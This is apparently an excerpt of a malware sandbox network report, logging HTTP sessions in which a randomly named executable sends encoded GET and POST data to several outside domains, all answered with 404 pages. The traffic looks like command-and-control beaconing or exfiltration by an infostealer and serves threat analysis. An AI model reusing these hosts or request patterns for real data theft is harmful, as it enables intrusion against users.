Jan 15, 2025 19:42:22.439168930 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sodLTX4Z1cooQLez6d0hwzwJfywcKCNx6vZ%2BTezpGQSDoY6GjGOf3etiLambYEcNcZ1GSsvIQTEUQU1l9rql87L6B3sQJlFHmhZL2lhs%2FkXc%2B%2BMXno28Rf%2BHnaVXc5lymX6PYNxmZlji9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90280158ef4241a6-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10935&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 [TRUNCATED] Data Ascii: 2c5]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"
Jan 15, 2025 19:42:22.439230919 CET	321	IN	Data Raw: 65 1e 43 89 44 68 7c 5b f3 4c aa 22 02 3f 74 c2 5b 7b 7f d2 d9 4f a6 f5 f6 c0 bf 86 9b 8d cc 49 44 93 d3 13 a7 fe b5 d8 01 e0 97 b8 a2 88 af 49 c7 43 c0 74 de 5d e4 56 43 ba 8e 60 e2 ea dc 3b e4 b2 f9 2f 1e 7b 22 8f 4a a9 ae f7 df 6d 72 7c 32 79 Data Ascii: eCDh\|[L"?t[{OIDICt]VC`;/{"Jmr\|2yzvGH+jxFJnAG'qlupWf.9qzUm1/M4a<MX=D0a"[Q\6Sz4dZ y& hAiJK5O$B^CX\X]t8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	64453	104.21.32.1	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:24.355755091 CET	559	OUT	GET /sbv2/?PZtTT8P0=KCOXl4L0MjZtpt9om/tmYw0VttOad0yMCs4OQKkXNc8VH0itCYxOihExehlokU3aZEnUGvFTmMELvqtU+Kox5tVgQ7KRBTJUg1vzgVjJ1xaulaVtzEKyyvI=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.cikolatasampuan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:42:24.976391077 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYb6WjdZxFs1DB1vIj%2BMVcj63QkmoGNtu%2BmSvGdLvD2btihTmKLkg7Gx3mVvQ6QXMGKicI8yOe9i5taSG%2B9Gd7j7Zns5uQEPOJhlOEjxLJNGxgs7ILgEz8y33vALxivx%2FQt2%2Fop9J%2Bzujg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90280168ae2a72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=559&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 [TRUNCATED] Data Ascii: 581<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14p
Jan 15, 2025 19:42:24.976416111 CET	996	IN	Data Raw: 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 Data Ascii: x; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	64454	162.0.236.169	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:30.038793087 CET	833	OUT	POST /brgm/ HTTP/1.1 Host: www.buildfuture.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.buildfuture.website Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.buildfuture.website/brgm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 62 70 67 74 65 71 6a 53 6c 55 51 6c 79 4d 53 53 37 43 76 6a 49 30 5a 6c 72 41 62 58 6c 7a 53 70 2f 77 39 6c 51 59 38 4d 6e 6d 50 39 34 34 6c 4b 65 48 56 73 4a 44 47 49 56 67 34 72 42 76 4f 37 48 53 2b 57 72 55 6b 78 49 61 77 63 45 6a 57 5a 43 35 53 35 46 69 55 36 6a 46 52 50 66 53 6d 41 73 7a 57 67 64 41 63 6e 31 41 56 45 42 57 57 59 4e 79 6b 6b 37 61 6b 4b 47 66 45 62 76 41 64 57 4a 4b 46 64 56 57 63 78 79 6f 61 46 4d 4e 71 34 66 70 54 58 77 55 35 72 49 50 2b 78 68 70 37 57 68 37 68 63 43 5a 7a 61 77 45 6d 6d 77 34 7a 48 54 4f 7a 78 45 76 6b 69 37 53 58 35 67 70 65 4b 41 3d 3d Data Ascii: PZtTT8P0=+bpgteqjSlUQlyMSS7CvjI0ZlrAbXlzSp/w9lQY8MnmP944lKeHVsJDGIVg4rBvO7HS+WrUkxIawcEjWZC5S5FiU6jFRPfSmAszWgdAcn1AVEBWWYNykk7akKGfEbvAdWJKFdVWcxyoaFMNq4fpTXwU5rIP+xhp7Wh7hcCZzawEmmw4zHTOzxEvki7SX5gpeKA==
Jan 15, 2025 19:42:30.642826080 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	64455	162.0.236.169	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:32.628897905 CET	853	OUT	POST /brgm/ HTTP/1.1 Host: www.buildfuture.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.buildfuture.website Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.buildfuture.website/brgm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 62 70 67 74 65 71 6a 53 6c 55 51 6b 53 63 53 65 34 36 76 6b 6f 30 57 35 62 41 62 46 6c 7a 65 70 2f 38 39 6c 55 6f 57 4d 78 57 50 39 63 30 6c 4c 63 2f 56 72 4a 44 47 44 31 67 39 6c 68 76 46 37 48 50 4a 57 71 6f 6b 78 49 4f 77 63 41 7a 57 5a 78 68 52 34 56 69 57 32 44 45 33 43 2f 53 6d 41 73 7a 57 67 63 67 6d 6e 31 59 56 45 78 6d 57 61 6f 4f 6c 36 72 61 6c 50 47 66 45 4d 2f 41 5a 57 4a 4c 53 64 57 53 36 78 77 51 61 46 4f 56 71 2f 4f 70 63 41 67 55 2f 6b 6f 4f 4e 31 6b 4d 78 5a 6b 4f 31 61 52 4a 33 63 68 38 79 6e 32 31 70 57 69 76 6b 6a 45 4c 58 2f 38 62 6a 30 6a 55 58 52 43 78 62 33 47 6f 58 59 53 67 79 4e 72 79 79 30 48 68 71 42 62 55 3d Data Ascii: PZtTT8P0=+bpgteqjSlUQkScSe46vko0W5bAbFlzep/89lUoWMxWP9c0lLc/VrJDGD1g9lhvF7HPJWqokxIOwcAzWZxhR4ViW2DE3C/SmAszWgcgmn1YVExmWaoOl6ralPGfEM/AZWJLSdWS6xwQaFOVq/OpcAgU/koON1kMxZkO1aRJ3ch8yn21pWivkjELX/8bj0jUXRCxb3GoXYSgyNryy0HhqBbU=
Jan 15, 2025 19:42:33.216074944 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	64456	162.0.236.169	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:35.173688889 CET	10935	OUT	POST /brgm/ HTTP/1.1 Host: www.buildfuture.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.buildfuture.website Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.buildfuture.website/brgm/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 2b 62 70 67 74 65 71 6a 53 6c 55 51 6b 53 63 53 65 34 36 76 6b 6f 30 57 35 62 41 62 46 6c 7a 65 70 2f 38 39 6c 55 6f 57 4d 78 65 50 39 50 38 6c 4b 37 54 56 71 4a 44 47 4b 56 67 47 6c 68 76 69 37 48 58 4e 57 71 6c 5a 78 4d 2b 77 54 43 37 57 66 41 68 52 79 56 69 57 73 6a 45 6a 50 66 54 6d 41 73 44 53 67 64 4d 6d 6e 31 59 56 45 7a 2b 57 64 39 79 6c 34 72 61 6b 4b 47 65 51 62 76 41 6c 57 49 6a 43 64 56 2b 71 78 44 59 61 4c 4f 46 71 2b 38 52 63 66 51 55 39 68 6f 4f 56 31 6b 49 79 5a 69 71 35 61 53 56 64 63 68 59 79 6c 42 45 33 50 78 50 42 39 6c 6a 6f 39 63 54 66 74 54 45 33 52 52 6c 48 79 58 73 62 62 42 6b 6e 41 37 76 5a 77 79 4a 63 55 50 2b 30 79 46 32 5a 70 4e 59 2f 54 77 53 72 58 49 76 63 7a 72 51 71 52 42 76 4b 2f 48 32 37 33 65 6f 75 79 41 43 45 59 45 68 6c 62 46 69 65 36 44 64 6a 36 4d 57 6f 72 45 41 4e 58 78 2f 51 56 46 77 46 6f 65 4e 6b 75 38 67 33 41 56 6a 36 78 56 63 67 74 43 39 4c 37 67 48 4c 47 59 71 41 59 77 5a 34 54 45 64 57 6c 6f 38 2b 65 6a 4b 42 2b 74 51 68 73 [TRUNCATED] Data Ascii: PZtTT8P0=+bpgteqjSlUQkScSe46vko0W5bAbFlzep/89lUoWMxeP9P8lK7TVqJDGKVgGlhvi7HXNWqlZxM+wTC7WfAhRyViWsjEjPfTmAsDSgdMmn1YVEz+Wd9yl4rakKGeQbvAlWIjCdV+qxDYaLOFq+8RcfQU9hoOV1kIyZiq5aSVdchYylBE3PxPB9ljo9cTftTE3RRlHyXsbbBknA7vZwyJcUP+0yF2ZpNY/TwSrXIvczrQqRBvK/H273eouyACEYEhlbFie6Ddj6MWorEANXx/QVFwFoeNku8g3AVj6xVcgtC9L7gHLGYqAYwZ4TEdWlo8+ejKB+tQhs4dFsEJJ+w5wey21f7W3EMS5yVryRT0aZUOu+rz5ZaG9UfOIqboqp/8/BJan6ewF86MPVO5l5Y+6P7UwHSVw/ddqTmO1lkFS8oMb4DTT6x2rwegoXLz0AmZKkagzTcMAMt0DWgexJOVPrdKXucY5H8DywBmHOqozpuo95j1q3T9zLgQzJRTN6XwISso/eXhR7rysHyHvIwMqcSSwZDY6kiQzdpuVdqh+YxVTjNScB5lr2wkK0mfIgTdayspwoxFKLaCQ3xzD2MqFCn17aSeI6oVgpRaycVdv1Dy8l2kBUfZ3arCXfxyeLes8D0BShP+7Bk73Zw1bT6+KfS1w6QrzKYlsh7yzYU2A9Vmq+OD2scclPj3dmfhj/87lOZhsEQ97v+7V7RqkabMd64RrQlVJaxLDxCcQvojNoqsPK6Z5beCmMgpQ+EZuzaQKDDzvBHxrYelIzefx5GIdBz7W/SlX8V0IhfrPHc23CUu4qyFJxNVQLSIkkBt0P/re6aIwlkdZylfpPHzHGMP/66YWvnXpzVrlNliLVFkTYgu54qTMdQv97hEEQRZjHj6FjQujnH7m9BiAAZUTaE4Hrtc9HBl8IfH1TQ14li2Hb3lddE9cLNIrcM028UhbsfChpRI9Xmotz+p6rE5TXpunm9U0dB4FznNjmn8s4YHbD/k [TRUNCATED]
Jan 15, 2025 19:42:35.798017025 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	64457	162.0.236.169	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:37.712526083 CET	559	OUT	GET /brgm/?-HT0=eZZx0LUhp4u8Nb7&PZtTT8P0=zZBAurvGVFID4gQja6K5puo946UQMWfD5PMg/RgwWhmYguwOMej1h7bKFXAKsHPKzWTIbqUmzdTnclHnVVtC51fb9z47H8HhLLvcw9Akuk8AFxTwcor1860= HTTP/1.1 Host: www.buildfuture.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:42:38.298191071 CET	548	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	64458	185.68.108.243	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:43.380831957 CET	824	OUT	POST /s4sk/ HTTP/1.1 Host: www.accusolution.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.accusolution.pro Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.accusolution.pro/s4sk/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 39 33 62 55 49 45 56 79 75 38 41 6c 54 37 2b 46 6b 41 67 74 30 34 69 48 61 54 78 78 4a 54 68 79 47 34 37 46 75 2f 2b 58 58 74 4f 2b 47 57 30 4a 4e 44 6d 5a 66 32 39 4b 6b 6f 4e 58 47 72 73 36 4d 42 6c 33 63 6d 48 48 71 4e 53 58 35 62 45 73 4e 6c 32 56 74 4f 59 62 55 37 43 39 2f 46 43 4e 55 63 4a 6d 61 75 45 53 53 6c 6b 33 45 5a 53 62 35 2b 76 2b 4d 4b 77 70 6f 6f 53 6a 70 6c 38 63 56 48 34 2f 63 34 68 6b 31 2b 6d 37 72 54 45 4e 42 6a 4f 56 6b 4a 51 49 6a 67 38 63 65 72 4e 72 73 44 69 70 70 48 38 4d 64 6a 46 35 7a 5a 66 6d 55 77 4c 49 30 6f 6a 55 6b 61 34 56 41 44 6a 54 45 77 3d 3d Data Ascii: 